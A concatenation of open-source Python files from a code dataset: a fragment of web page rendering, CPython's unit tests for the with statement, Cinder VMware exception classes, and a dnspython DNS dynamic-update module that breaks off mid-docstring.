        upload_url = WebContainer.get_web().get_upload_url()
        html.writeln("<script>var tactic_repo=new TacticRepo()</script>")
        # TacticRepo needs the upload endpoint to post files to the server.
        html.writeln("<script>tactic_repo.upload_url='%s'</script>" %upload_url)
        return html
| epl-1.0 |
seem-sky/kbengine | kbe/src/lib/python/Lib/test/test_with.py | 84 | 26503 | """Unit tests for the with statement specified in PEP 343."""
__author__ = "Mike Bland"
__email__ = "mbland at acm dot org"
import sys
import unittest
from collections import deque
from contextlib import _GeneratorContextManager, contextmanager
from test.support import run_unittest
class MockContextManager(_GeneratorContextManager):
    """Context manager wrapper that records __enter__/__exit__ activity.

    NOTE(review): forwards ``*args, **kwds`` unpacked to the base
    initializer; the private ``_GeneratorContextManager.__init__``
    signature has changed across CPython releases (some take
    ``(func, args, kwds)``) — confirm against the targeted stdlib version.
    """
    def __init__(self, func, *args, **kwds):
        super().__init__(func, *args, **kwds)
        self.enter_called = False  # set once __enter__ has run
        self.exit_called = False   # set once __exit__ has run
        self.exit_args = None      # (type, value, traceback) passed to __exit__
    def __enter__(self):
        self.enter_called = True
        return _GeneratorContextManager.__enter__(self)
    def __exit__(self, type, value, traceback):
        self.exit_called = True
        self.exit_args = (type, value, traceback)
        # Delegate suppression decision to the generator-based base class.
        return _GeneratorContextManager.__exit__(self, type,
                                                 value, traceback)
def mock_contextmanager(func):
    """Decorator: wrap a generator function in a MockContextManager factory."""
    def factory(*args, **kwargs):
        return MockContextManager(func, *args, **kwargs)
    return factory
class MockResource(object):
    """Flag holder yielded by the mock context manager generator."""
    def __init__(self):
        # yielded: generator reached its yield; stopped: its finally ran.
        self.yielded = self.stopped = False
@mock_contextmanager
def mock_contextmanager_generator():
    """Yield a MockResource, marking it yielded before and stopped after."""
    mock = MockResource()
    try:
        mock.yielded = True
        yield mock
    finally:
        # Runs on normal exit, exception, and generator close alike.
        mock.stopped = True
class Nested(object):
    """Reimplementation of the old contextlib.nested() semantics.

    Enters the given managers left to right and exits them in reverse,
    mirroring lexically nested ``with`` statements.  Not reentrant.
    """
    def __init__(self, *managers):
        self.managers = managers
        self.entered = None  # deque of entered managers (exit order) or None
    def __enter__(self):
        if self.entered is not None:
            raise RuntimeError("Context is not reentrant")
        self.entered = deque()
        vars = []
        try:
            for mgr in self.managers:
                vars.append(mgr.__enter__())
                # appendleft so iterating self.entered exits last-in first.
                self.entered.appendleft(mgr)
        except:
            # Unwind whatever was entered; re-raise unless an __exit__
            # along the way reports the exception as handled.
            if not self.__exit__(*sys.exc_info()):
                raise
        return vars
    def __exit__(self, *exc_info):
        # Behave like nested with statements
        # first in, last out
        # New exceptions override old ones
        ex = exc_info
        for mgr in self.entered:
            try:
                if mgr.__exit__(*ex):
                    # This manager swallowed the current exception.
                    ex = (None, None, None)
            except:
                ex = sys.exc_info()
        self.entered = None
        if ex is not exc_info:
            # An inner __exit__ raised (or changed) the exception: re-raise it.
            raise ex[0](ex[1]).with_traceback(ex[2])
class MockNested(Nested):
    """Nested variant that records __enter__/__exit__ calls for assertions."""
    def __init__(self, *managers):
        super().__init__(*managers)
        self.enter_called = False
        self.exit_called = False
        self.exit_args = None
    def __enter__(self):
        self.enter_called = True
        return super().__enter__()
    def __exit__(self, *exc_info):
        self.exit_called = True
        self.exit_args = exc_info
        return super().__exit__(*exc_info)
class FailureTestCase(unittest.TestCase):
    """Ways a with statement can fail before or around the managed block."""
    def testNameError(self):
        def fooNotDeclared():
            with foo: pass
        self.assertRaises(NameError, fooNotDeclared)
    def testEnterAttributeError(self):
        class LacksEnter(object):
            def __exit__(self, type, value, traceback):
                pass
        def fooLacksEnter():
            foo = LacksEnter()
            with foo: pass
        self.assertRaises(AttributeError, fooLacksEnter)
    def testExitAttributeError(self):
        class LacksExit(object):
            def __enter__(self):
                pass
        def fooLacksExit():
            foo = LacksExit()
            with foo: pass
        self.assertRaises(AttributeError, fooLacksExit)
    def assertRaisesSyntaxError(self, codestr):
        # Helper: compiling codestr must raise SyntaxError.
        def shouldRaiseSyntaxError(s):
            compile(s, '', 'single')
        self.assertRaises(SyntaxError, shouldRaiseSyntaxError, codestr)
    def testAssignmentToNoneError(self):
        self.assertRaisesSyntaxError('with mock as None:\n pass')
        self.assertRaisesSyntaxError(
            'with mock as (None):\n'
            ' pass')
    def testAssignmentToEmptyTupleError(self):
        self.assertRaisesSyntaxError(
            'with mock as ():\n'
            ' pass')
    def testAssignmentToTupleOnlyContainingNoneError(self):
        self.assertRaisesSyntaxError('with mock as None,:\n pass')
        self.assertRaisesSyntaxError(
            'with mock as (None,):\n'
            ' pass')
    def testAssignmentToTupleContainingNoneError(self):
        self.assertRaisesSyntaxError(
            'with mock as (foo, None, bar):\n'
            ' pass')
    def testEnterThrows(self):
        class EnterThrows(object):
            def __enter__(self):
                raise RuntimeError("Enter threw")
            def __exit__(self, *args):
                pass
        def shouldThrow():
            ct = EnterThrows()
            self.foo = None
            with ct as self.foo:
                pass
        self.assertRaises(RuntimeError, shouldThrow)
        # The target must not have been assigned if __enter__ raised.
        self.assertEqual(self.foo, None)
    def testExitThrows(self):
        class ExitThrows(object):
            def __enter__(self):
                return
            def __exit__(self, *args):
                raise RuntimeError(42)
        def shouldThrow():
            with ExitThrows():
                pass
        self.assertRaises(RuntimeError, shouldThrow)
class ContextmanagerAssertionMixin(object):
    """Shared assertions about mock manager/generator state transitions."""
    def setUp(self):
        self.TEST_EXCEPTION = RuntimeError("test exception")
    def assertInWithManagerInvariants(self, mock_manager):
        # Inside the with block: entered but not yet exited.
        self.assertTrue(mock_manager.enter_called)
        self.assertFalse(mock_manager.exit_called)
        self.assertEqual(mock_manager.exit_args, None)
    def assertAfterWithManagerInvariants(self, mock_manager, exit_args):
        self.assertTrue(mock_manager.enter_called)
        self.assertTrue(mock_manager.exit_called)
        self.assertEqual(mock_manager.exit_args, exit_args)
    def assertAfterWithManagerInvariantsNoError(self, mock_manager):
        # Clean exit passes (None, None, None) to __exit__.
        self.assertAfterWithManagerInvariants(mock_manager,
                                              (None, None, None))
    def assertInWithGeneratorInvariants(self, mock_generator):
        self.assertTrue(mock_generator.yielded)
        self.assertFalse(mock_generator.stopped)
    def assertAfterWithGeneratorInvariantsNoError(self, mock_generator):
        self.assertTrue(mock_generator.yielded)
        self.assertTrue(mock_generator.stopped)
    def raiseTestException(self):
        raise self.TEST_EXCEPTION
    def assertAfterWithManagerInvariantsWithError(self, mock_manager,
                                                  exc_type=None):
        self.assertTrue(mock_manager.enter_called)
        self.assertTrue(mock_manager.exit_called)
        if exc_type is None:
            self.assertEqual(mock_manager.exit_args[1], self.TEST_EXCEPTION)
            exc_type = type(self.TEST_EXCEPTION)
        self.assertEqual(mock_manager.exit_args[0], exc_type)
        # Test the __exit__ arguments. Issue #7853
        self.assertIsInstance(mock_manager.exit_args[1], exc_type)
        self.assertIsNot(mock_manager.exit_args[2], None)
    def assertAfterWithGeneratorInvariantsWithError(self, mock_generator):
        self.assertTrue(mock_generator.yielded)
        self.assertTrue(mock_generator.stopped)
class NonexceptionalTestCase(unittest.TestCase, ContextmanagerAssertionMixin):
    """With statements that complete without raising."""
    def testInlineGeneratorSyntax(self):
        with mock_contextmanager_generator():
            pass
    def testUnboundGenerator(self):
        mock = mock_contextmanager_generator()
        with mock:
            pass
        self.assertAfterWithManagerInvariantsNoError(mock)
    def testInlineGeneratorBoundSyntax(self):
        with mock_contextmanager_generator() as foo:
            self.assertInWithGeneratorInvariants(foo)
        # FIXME: In the future, we'll try to keep the bound names from leaking
        self.assertAfterWithGeneratorInvariantsNoError(foo)
    def testInlineGeneratorBoundToExistingVariable(self):
        foo = None
        with mock_contextmanager_generator() as foo:
            self.assertInWithGeneratorInvariants(foo)
        self.assertAfterWithGeneratorInvariantsNoError(foo)
    def testInlineGeneratorBoundToDottedVariable(self):
        # The as-target may be an attribute reference, not just a name.
        with mock_contextmanager_generator() as self.foo:
            self.assertInWithGeneratorInvariants(self.foo)
        self.assertAfterWithGeneratorInvariantsNoError(self.foo)
    def testBoundGenerator(self):
        mock = mock_contextmanager_generator()
        with mock as foo:
            self.assertInWithGeneratorInvariants(foo)
            self.assertInWithManagerInvariants(mock)
        self.assertAfterWithGeneratorInvariantsNoError(foo)
        self.assertAfterWithManagerInvariantsNoError(mock)
    def testNestedSingleStatements(self):
        mock_a = mock_contextmanager_generator()
        with mock_a as foo:
            mock_b = mock_contextmanager_generator()
            with mock_b as bar:
                self.assertInWithManagerInvariants(mock_a)
                self.assertInWithManagerInvariants(mock_b)
                self.assertInWithGeneratorInvariants(foo)
                self.assertInWithGeneratorInvariants(bar)
            # Inner manager exits first; the outer one is still active.
            self.assertAfterWithManagerInvariantsNoError(mock_b)
            self.assertAfterWithGeneratorInvariantsNoError(bar)
            self.assertInWithManagerInvariants(mock_a)
            self.assertInWithGeneratorInvariants(foo)
        self.assertAfterWithManagerInvariantsNoError(mock_a)
        self.assertAfterWithGeneratorInvariantsNoError(foo)
class NestedNonexceptionalTestCase(unittest.TestCase,
                                   ContextmanagerAssertionMixin):
    """Nested()/MockNested() combinations that complete without raising."""
    def testSingleArgInlineGeneratorSyntax(self):
        with Nested(mock_contextmanager_generator()):
            pass
    def testSingleArgBoundToNonTuple(self):
        m = mock_contextmanager_generator()
        # This will bind all the arguments to nested() into a single list
        # assigned to foo.
        with Nested(m) as foo:
            self.assertInWithManagerInvariants(m)
        self.assertAfterWithManagerInvariantsNoError(m)
    def testSingleArgBoundToSingleElementParenthesizedList(self):
        m = mock_contextmanager_generator()
        # This will bind all the arguments to nested() into a single list
        # assigned to foo.
        with Nested(m) as (foo):
            self.assertInWithManagerInvariants(m)
        self.assertAfterWithManagerInvariantsNoError(m)
    def testSingleArgBoundToMultipleElementTupleError(self):
        # Unpacking a one-element list into two targets must fail.
        def shouldThrowValueError():
            with Nested(mock_contextmanager_generator()) as (foo, bar):
                pass
        self.assertRaises(ValueError, shouldThrowValueError)
    def testSingleArgUnbound(self):
        mock_contextmanager = mock_contextmanager_generator()
        mock_nested = MockNested(mock_contextmanager)
        with mock_nested:
            self.assertInWithManagerInvariants(mock_contextmanager)
            self.assertInWithManagerInvariants(mock_nested)
        self.assertAfterWithManagerInvariantsNoError(mock_contextmanager)
        self.assertAfterWithManagerInvariantsNoError(mock_nested)
    def testMultipleArgUnbound(self):
        m = mock_contextmanager_generator()
        n = mock_contextmanager_generator()
        o = mock_contextmanager_generator()
        mock_nested = MockNested(m, n, o)
        with mock_nested:
            self.assertInWithManagerInvariants(m)
            self.assertInWithManagerInvariants(n)
            self.assertInWithManagerInvariants(o)
            self.assertInWithManagerInvariants(mock_nested)
        self.assertAfterWithManagerInvariantsNoError(m)
        self.assertAfterWithManagerInvariantsNoError(n)
        self.assertAfterWithManagerInvariantsNoError(o)
        self.assertAfterWithManagerInvariantsNoError(mock_nested)
    def testMultipleArgBound(self):
        mock_nested = MockNested(mock_contextmanager_generator(),
            mock_contextmanager_generator(), mock_contextmanager_generator())
        with mock_nested as (m, n, o):
            self.assertInWithGeneratorInvariants(m)
            self.assertInWithGeneratorInvariants(n)
            self.assertInWithGeneratorInvariants(o)
            self.assertInWithManagerInvariants(mock_nested)
        self.assertAfterWithGeneratorInvariantsNoError(m)
        self.assertAfterWithGeneratorInvariantsNoError(n)
        self.assertAfterWithGeneratorInvariantsNoError(o)
        self.assertAfterWithManagerInvariantsNoError(mock_nested)
class ExceptionalTestCase(ContextmanagerAssertionMixin, unittest.TestCase):
    """With statements whose body (or __exit__) raises an exception."""
    def testSingleResource(self):
        cm = mock_contextmanager_generator()
        def shouldThrow():
            with cm as self.resource:
                self.assertInWithManagerInvariants(cm)
                self.assertInWithGeneratorInvariants(self.resource)
                self.raiseTestException()
        self.assertRaises(RuntimeError, shouldThrow)
        self.assertAfterWithManagerInvariantsWithError(cm)
        self.assertAfterWithGeneratorInvariantsWithError(self.resource)
    def testExceptionNormalized(self):
        cm = mock_contextmanager_generator()
        def shouldThrow():
            with cm as self.resource:
                # Note this relies on the fact that 1 // 0 produces an exception
                # that is not normalized immediately.
                1 // 0
        self.assertRaises(ZeroDivisionError, shouldThrow)
        self.assertAfterWithManagerInvariantsWithError(cm, ZeroDivisionError)
    def testNestedSingleStatements(self):
        mock_a = mock_contextmanager_generator()
        mock_b = mock_contextmanager_generator()
        def shouldThrow():
            with mock_a as self.foo:
                with mock_b as self.bar:
                    self.assertInWithManagerInvariants(mock_a)
                    self.assertInWithManagerInvariants(mock_b)
                    self.assertInWithGeneratorInvariants(self.foo)
                    self.assertInWithGeneratorInvariants(self.bar)
                    self.raiseTestException()
        self.assertRaises(RuntimeError, shouldThrow)
        # Both managers see the exception on the way out.
        self.assertAfterWithManagerInvariantsWithError(mock_a)
        self.assertAfterWithManagerInvariantsWithError(mock_b)
        self.assertAfterWithGeneratorInvariantsWithError(self.foo)
        self.assertAfterWithGeneratorInvariantsWithError(self.bar)
    def testMultipleResourcesInSingleStatement(self):
        cm_a = mock_contextmanager_generator()
        cm_b = mock_contextmanager_generator()
        mock_nested = MockNested(cm_a, cm_b)
        def shouldThrow():
            with mock_nested as (self.resource_a, self.resource_b):
                self.assertInWithManagerInvariants(cm_a)
                self.assertInWithManagerInvariants(cm_b)
                self.assertInWithManagerInvariants(mock_nested)
                self.assertInWithGeneratorInvariants(self.resource_a)
                self.assertInWithGeneratorInvariants(self.resource_b)
                self.raiseTestException()
        self.assertRaises(RuntimeError, shouldThrow)
        self.assertAfterWithManagerInvariantsWithError(cm_a)
        self.assertAfterWithManagerInvariantsWithError(cm_b)
        self.assertAfterWithManagerInvariantsWithError(mock_nested)
        self.assertAfterWithGeneratorInvariantsWithError(self.resource_a)
        self.assertAfterWithGeneratorInvariantsWithError(self.resource_b)
    def testNestedExceptionBeforeInnerStatement(self):
        mock_a = mock_contextmanager_generator()
        mock_b = mock_contextmanager_generator()
        self.bar = None
        def shouldThrow():
            with mock_a as self.foo:
                self.assertInWithManagerInvariants(mock_a)
                self.assertInWithGeneratorInvariants(self.foo)
                self.raiseTestException()
                with mock_b as self.bar:
                    pass
        self.assertRaises(RuntimeError, shouldThrow)
        self.assertAfterWithManagerInvariantsWithError(mock_a)
        self.assertAfterWithGeneratorInvariantsWithError(self.foo)
        # The inner statement stuff should never have been touched
        self.assertEqual(self.bar, None)
        self.assertFalse(mock_b.enter_called)
        self.assertFalse(mock_b.exit_called)
        self.assertEqual(mock_b.exit_args, None)
    def testNestedExceptionAfterInnerStatement(self):
        mock_a = mock_contextmanager_generator()
        mock_b = mock_contextmanager_generator()
        def shouldThrow():
            with mock_a as self.foo:
                with mock_b as self.bar:
                    self.assertInWithManagerInvariants(mock_a)
                    self.assertInWithManagerInvariants(mock_b)
                    self.assertInWithGeneratorInvariants(self.foo)
                    self.assertInWithGeneratorInvariants(self.bar)
                self.raiseTestException()
        self.assertRaises(RuntimeError, shouldThrow)
        # Only the outer manager sees the exception; the inner one exited
        # cleanly before the raise.
        self.assertAfterWithManagerInvariantsWithError(mock_a)
        self.assertAfterWithManagerInvariantsNoError(mock_b)
        self.assertAfterWithGeneratorInvariantsWithError(self.foo)
        self.assertAfterWithGeneratorInvariantsNoError(self.bar)
    def testRaisedStopIteration1(self):
        # From bug 1462485
        @contextmanager
        def cm():
            yield
        def shouldThrow():
            with cm():
                raise StopIteration("from with")
        self.assertRaises(StopIteration, shouldThrow)
    def testRaisedStopIteration2(self):
        # From bug 1462485
        class cm(object):
            def __enter__(self):
                pass
            def __exit__(self, type, value, traceback):
                pass
        def shouldThrow():
            with cm():
                raise StopIteration("from with")
        self.assertRaises(StopIteration, shouldThrow)
    def testRaisedStopIteration3(self):
        # Another variant where the exception hasn't been instantiated
        # From bug 1705170
        @contextmanager
        def cm():
            yield
        def shouldThrow():
            with cm():
                raise next(iter([]))
        self.assertRaises(StopIteration, shouldThrow)
    def testRaisedGeneratorExit1(self):
        # From bug 1462485
        @contextmanager
        def cm():
            yield
        def shouldThrow():
            with cm():
                raise GeneratorExit("from with")
        self.assertRaises(GeneratorExit, shouldThrow)
    def testRaisedGeneratorExit2(self):
        # From bug 1462485
        class cm (object):
            def __enter__(self):
                pass
            def __exit__(self, type, value, traceback):
                pass
        def shouldThrow():
            with cm():
                raise GeneratorExit("from with")
        self.assertRaises(GeneratorExit, shouldThrow)
    def testErrorsInBool(self):
        # issue4589: __exit__ return code may raise an exception
        # when looking at its truth value.
        class cm(object):
            def __init__(self, bool_conversion):
                class Bool:
                    def __bool__(self):
                        return bool_conversion()
                self.exit_result = Bool()
            def __enter__(self):
                return 3
            def __exit__(self, a, b, c):
                return self.exit_result
        def trueAsBool():
            with cm(lambda: True):
                self.fail("Should NOT see this")
        trueAsBool()
        def falseAsBool():
            with cm(lambda: False):
                self.fail("Should raise")
        self.assertRaises(AssertionError, falseAsBool)
        def failAsBool():
            with cm(lambda: 1//0):
                self.fail("Should NOT see this")
        self.assertRaises(ZeroDivisionError, failAsBool)
class NonLocalFlowControlTestCase(unittest.TestCase):
    """break/continue/return/yield/raise leaving a with block still exits it."""
    def testWithBreak(self):
        counter = 0
        while True:
            counter += 1
            with mock_contextmanager_generator():
                counter += 10
                break
            counter += 100 # Not reached
        self.assertEqual(counter, 11)
    def testWithContinue(self):
        counter = 0
        while True:
            counter += 1
            if counter > 2:
                break
            with mock_contextmanager_generator():
                counter += 10
                continue
            counter += 100 # Not reached
        self.assertEqual(counter, 12)
    def testWithReturn(self):
        def foo():
            counter = 0
            while True:
                counter += 1
                with mock_contextmanager_generator():
                    counter += 10
                    return counter
                counter += 100 # Not reached
        self.assertEqual(foo(), 11)
    def testWithYield(self):
        def gen():
            with mock_contextmanager_generator():
                yield 12
                yield 13
        x = list(gen())
        self.assertEqual(x, [12, 13])
    def testWithRaise(self):
        counter = 0
        try:
            counter += 1
            with mock_contextmanager_generator():
                counter += 10
                raise RuntimeError
            counter += 100 # Not reached
        except RuntimeError:
            self.assertEqual(counter, 11)
        else:
            self.fail("Didn't raise RuntimeError")
class AssignmentTargetTestCase(unittest.TestCase):
    """The as-clause accepts arbitrary assignment targets, not just names."""
    def testSingleComplexTarget(self):
        targets = {1: [0, 1, 2]}
        # Subscription target.
        with mock_contextmanager_generator() as targets[1][0]:
            self.assertEqual(list(targets.keys()), [1])
            self.assertEqual(targets[1][0].__class__, MockResource)
        # Subscription of a call expression is a valid target too.
        with mock_contextmanager_generator() as list(targets.values())[0][1]:
            self.assertEqual(list(targets.keys()), [1])
            self.assertEqual(targets[1][1].__class__, MockResource)
        with mock_contextmanager_generator() as targets[2]:
            keys = list(targets.keys())
            keys.sort()
            self.assertEqual(keys, [1, 2])
        class C: pass
        blah = C()
        # Attribute target.
        with mock_contextmanager_generator() as blah.foo:
            self.assertEqual(hasattr(blah, "foo"), True)
    def testMultipleComplexTargets(self):
        class C:
            def __enter__(self): return 1, 2, 3
            def __exit__(self, t, v, tb): pass
        targets = {1: [0, 1, 2]}
        # Tuple unpacking into subscription/attribute targets.
        with C() as (targets[1][0], targets[1][1], targets[1][2]):
            self.assertEqual(targets, {1: [1, 2, 3]})
        with C() as (list(targets.values())[0][2], list(targets.values())[0][1], list(targets.values())[0][0]):
            self.assertEqual(targets, {1: [3, 2, 1]})
        with C() as (targets[1], targets[2], targets[3]):
            self.assertEqual(targets, {1: 1, 2: 2, 3: 3})
        class B: pass
        blah = B()
        with C() as (blah.one, blah.two, blah.three):
            self.assertEqual(blah.one, 1)
            self.assertEqual(blah.two, 2)
            self.assertEqual(blah.three, 3)
class ExitSwallowsExceptionTestCase(unittest.TestCase):
    """The truth value returned by __exit__ decides exception suppression."""
    def testExitTrueSwallowsException(self):
        class Suppressor:
            def __enter__(self): pass
            def __exit__(self, exc_type, exc_val, exc_tb): return True
        try:
            with Suppressor():
                1/0
        except ZeroDivisionError:
            self.fail("ZeroDivisionError should have been swallowed")
    def testExitFalseDoesntSwallowException(self):
        class Propagator:
            def __enter__(self): pass
            def __exit__(self, exc_type, exc_val, exc_tb): return False
        try:
            with Propagator():
                1/0
        except ZeroDivisionError:
            pass
        else:
            self.fail("ZeroDivisionError should have been raised")
class NestedWith(unittest.TestCase):
    """Multiple managers in one with statement: 'with a() as x, b() as y'."""
    class Dummy(object):
        # Records enter/exit and optionally swallows exceptions (gobble).
        def __init__(self, value=None, gobble=False):
            if value is None:
                value = self
            self.value = value
            self.gobble = gobble
            self.enter_called = False
            self.exit_called = False
        def __enter__(self):
            self.enter_called = True
            return self.value
        def __exit__(self, *exc_info):
            self.exit_called = True
            self.exc_info = exc_info
            if self.gobble:
                return True
    class InitRaises(object):
        def __init__(self): raise RuntimeError()
    class EnterRaises(object):
        def __enter__(self): raise RuntimeError()
        def __exit__(self, *exc_info): pass
    class ExitRaises(object):
        def __enter__(self): pass
        def __exit__(self, *exc_info): raise RuntimeError()
    def testNoExceptions(self):
        with self.Dummy() as a, self.Dummy() as b:
            self.assertTrue(a.enter_called)
            self.assertTrue(b.enter_called)
        self.assertTrue(a.exit_called)
        self.assertTrue(b.exit_called)
    def testExceptionInExprList(self):
        # Second manager fails to construct; the first must still exit.
        try:
            with self.Dummy() as a, self.InitRaises():
                pass
        except:
            pass
        self.assertTrue(a.enter_called)
        self.assertTrue(a.exit_called)
    def testExceptionInEnter(self):
        try:
            with self.Dummy() as a, self.EnterRaises():
                self.fail('body of bad with executed')
        except RuntimeError:
            pass
        else:
            self.fail('RuntimeError not reraised')
        self.assertTrue(a.enter_called)
        self.assertTrue(a.exit_called)
    def testExceptionInExit(self):
        body_executed = False
        # The first (gobbling) manager swallows the second's __exit__ error.
        with self.Dummy(gobble=True) as a, self.ExitRaises():
            body_executed = True
        self.assertTrue(a.enter_called)
        self.assertTrue(a.exit_called)
        self.assertTrue(body_executed)
        self.assertNotEqual(a.exc_info[0], None)
    def testEnterReturnsTuple(self):
        with self.Dummy(value=(1,2)) as (a1, a2), \
             self.Dummy(value=(10, 20)) as (b1, b2):
            self.assertEqual(1, a1)
            self.assertEqual(2, a2)
            self.assertEqual(10, b1)
            self.assertEqual(20, b2)
def test_main():
    """Run every with-statement test case via the shared test runner."""
    run_unittest(FailureTestCase, NonexceptionalTestCase,
                 NestedNonexceptionalTestCase, ExceptionalTestCase,
                 NonLocalFlowControlTestCase,
                 AssignmentTargetTestCase,
                 ExitSwallowsExceptionTestCase,
                 NestedWith)

if __name__ == '__main__':
    test_main()
| lgpl-3.0 |
abusse/cinder | cinder/volume/drivers/vmware/exceptions.py | 2 | 1459 | # Copyright (c) 2015 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Exception definitions.
"""
from oslo_vmware import exceptions
from cinder.i18n import _
class InvalidAdapterTypeException(exceptions.VMwareDriverException):
    """Thrown when the disk adapter type is invalid."""
    # Interpolated with the keyword arguments passed to the constructor.
    msg_fmt = _("Invalid disk adapter type: %(invalid_type)s.")
class InvalidDiskTypeException(exceptions.VMwareDriverException):
    """Thrown when the disk type is invalid."""
    # Interpolated with the keyword arguments passed to the constructor.
    msg_fmt = _("Invalid disk type: %(disk_type)s.")
class VirtualDiskNotFoundException(exceptions.VMwareDriverException):
    """Thrown when virtual disk is not found."""
    # Static message: no interpolation parameters.
    msg_fmt = _("There is no virtual disk device.")
class ProfileNotFoundException(exceptions.VMwareDriverException):
    """Thrown when the given storage profile cannot be found."""
    # Interpolated with the keyword arguments passed to the constructor.
    msg_fmt = _("Storage profile: %(storage_profile)s not found.")
| apache-2.0 |
jonhadfield/linkchecker | third_party/dnspython/dns/update.py | 108 | 10163 | # Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""DNS Dynamic Update Support"""
import dns.message
import dns.name
import dns.opcode
import dns.rdata
import dns.rdataclass
import dns.rdataset
import dns.tsig
class Update(dns.message.Message):
    """A DNS Dynamic Update (RFC 2136) message.

    The zone goes in the question section; prerequisites go in the answer
    section; the update RRs themselves go in the authority section.
    NOTE: this is Python 2 code (``unicode`` checks below).
    """
    def __init__(self, zone, rdclass=dns.rdataclass.IN, keyring=None,
                 keyname=None, keyalgorithm=dns.tsig.default_algorithm):
        """Initialize a new DNS Update object.

        @param zone: The zone which is being updated.
        @type zone: A dns.name.Name or string
        @param rdclass: The class of the zone; defaults to dns.rdataclass.IN.
        @type rdclass: An int designating the class, or a string whose value
        is the name of a class.
        @param keyring: The TSIG keyring to use; defaults to None.
        @type keyring: dict
        @param keyname: The name of the TSIG key to use; defaults to None.
        The key must be defined in the keyring. If a keyring is specified
        but a keyname is not, then the key used will be the first key in the
        keyring. Note that the order of keys in a dictionary is not defined,
        so applications should supply a keyname when a keyring is used, unless
        they know the keyring contains only one key.
        @type keyname: dns.name.Name or string
        @param keyalgorithm: The TSIG algorithm to use; defaults to
        dns.tsig.default_algorithm. Constants for TSIG algorithms are defined
        in dns.tsig, and the currently implemented algorithms are
        HMAC_MD5, HMAC_SHA1, HMAC_SHA224, HMAC_SHA256, HMAC_SHA384, and
        HMAC_SHA512.
        @type keyalgorithm: string
        """
        super(Update, self).__init__()
        self.flags |= dns.opcode.to_flags(dns.opcode.UPDATE)
        if isinstance(zone, (str, unicode)):
            zone = dns.name.from_text(zone)
        self.origin = zone
        if isinstance(rdclass, str):
            rdclass = dns.rdataclass.from_text(rdclass)
        self.zone_rdclass = rdclass
        # The zone is encoded as the (single) question, with type SOA.
        self.find_rrset(self.question, self.origin, rdclass, dns.rdatatype.SOA,
                        create=True, force_unique=True)
        if not keyring is None:
            self.use_tsig(keyring, keyname, algorithm=keyalgorithm)

    def _add_rr(self, name, ttl, rd, deleting=None, section=None):
        """Add a single RR to the update section."""
        if section is None:
            section = self.authority
        covers = rd.covers()
        rrset = self.find_rrset(section, name, self.zone_rdclass, rd.rdtype,
                                covers, deleting, True, True)
        rrset.add(rd, ttl)

    def _add(self, replace, section, name, *args):
        """Add records. The first argument is the replace mode. If
        false, RRs are added to an existing RRset; if true, the RRset
        is replaced with the specified contents. The second
        argument is the section to add to. The third argument
        is always a name. The other arguments can be:

            - rdataset...

            - ttl, rdata...

            - ttl, rdtype, string..."""
        if isinstance(name, (str, unicode)):
            name = dns.name.from_text(name, None)
        if isinstance(args[0], dns.rdataset.Rdataset):
            for rds in args:
                if replace:
                    self.delete(name, rds.rdtype)
                for rd in rds:
                    self._add_rr(name, rds.ttl, rd, section=section)
        else:
            args = list(args)
            ttl = int(args.pop(0))
            if isinstance(args[0], dns.rdata.Rdata):
                if replace:
                    self.delete(name, args[0].rdtype)
                for rd in args:
                    self._add_rr(name, ttl, rd, section=section)
            else:
                rdtype = args.pop(0)
                if isinstance(rdtype, str):
                    rdtype = dns.rdatatype.from_text(rdtype)
                if replace:
                    self.delete(name, rdtype)
                for s in args:
                    # Parse each remaining string as rdata of the given type.
                    rd = dns.rdata.from_text(self.zone_rdclass, rdtype, s,
                                             self.origin)
                    self._add_rr(name, ttl, rd, section=section)

    def add(self, name, *args):
        """Add records. The first argument is always a name. The other
        arguments can be:

            - rdataset...

            - ttl, rdata...

            - ttl, rdtype, string..."""
        self._add(False, self.authority, name, *args)

    def delete(self, name, *args):
        """Delete records. The first argument is always a name. The other
        arguments can be:

            - I{nothing}

            - rdataset...

            - rdata...

            - rdtype, [string...]"""
        if isinstance(name, (str, unicode)):
            name = dns.name.from_text(name, None)
        if len(args) == 0:
            # Delete all RRsets at the name (class ANY / type ANY).
            # NOTE(review): the bound rrset is unused; find_rrset appears to
            # be called for its side effect of adding the RR — confirm.
            rrset = self.find_rrset(self.authority, name, dns.rdataclass.ANY,
                                    dns.rdatatype.ANY, dns.rdatatype.NONE,
                                    dns.rdatatype.ANY, True, True)
        elif isinstance(args[0], dns.rdataset.Rdataset):
            for rds in args:
                for rd in rds:
                    # Class NONE means "delete this specific rdata".
                    self._add_rr(name, 0, rd, dns.rdataclass.NONE)
        else:
            args = list(args)
            if isinstance(args[0], dns.rdata.Rdata):
                for rd in args:
                    self._add_rr(name, 0, rd, dns.rdataclass.NONE)
            else:
                rdtype = args.pop(0)
                if isinstance(rdtype, (str, unicode)):
                    rdtype = dns.rdatatype.from_text(rdtype)
                if len(args) == 0:
                    # Delete an entire RRset of the given type.
                    rrset = self.find_rrset(self.authority, name,
                                            self.zone_rdclass, rdtype,
                                            dns.rdatatype.NONE,
                                            dns.rdataclass.ANY,
                                            True, True)
                else:
                    for s in args:
                        rd = dns.rdata.from_text(self.zone_rdclass, rdtype, s,
                                                 self.origin)
                        self._add_rr(name, 0, rd, dns.rdataclass.NONE)

    def replace(self, name, *args):
        """Replace records. The first argument is always a name. The other
        arguments can be:

            - rdataset...

            - ttl, rdata...

            - ttl, rdtype, string...

